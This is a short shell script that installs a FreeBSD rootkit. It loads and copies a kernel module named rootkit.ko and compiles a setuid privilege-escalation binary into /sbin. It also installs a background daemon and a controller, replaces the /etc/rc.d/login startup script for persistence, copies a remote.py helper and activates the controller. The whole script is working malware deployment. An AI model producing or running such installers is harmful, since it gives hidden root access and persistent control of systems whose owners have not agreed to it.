#!/bin/sh

make
#echo 'rootkit_load="YES"' > /boot/loader.conf
kldload ./rootkit.ko
echo "" > /log.txt
chmod 666 /log.txt
cp rootkit.ko /boot/kernel
cc controller.c -o /sbin/controller
cc priv_esc.c -o priv_esc
cp priv_esc /sbin/priv_esc
chmod +s /sbin/priv_esc
cc daemon.c -o daemon
mv daemon /sbin/daemon
sed "s/yeet/$1/" login_tmp > login
mv login /etc/rc.d/login
/sbin/daemon $1 &
cp remote.py /remote.py
controller on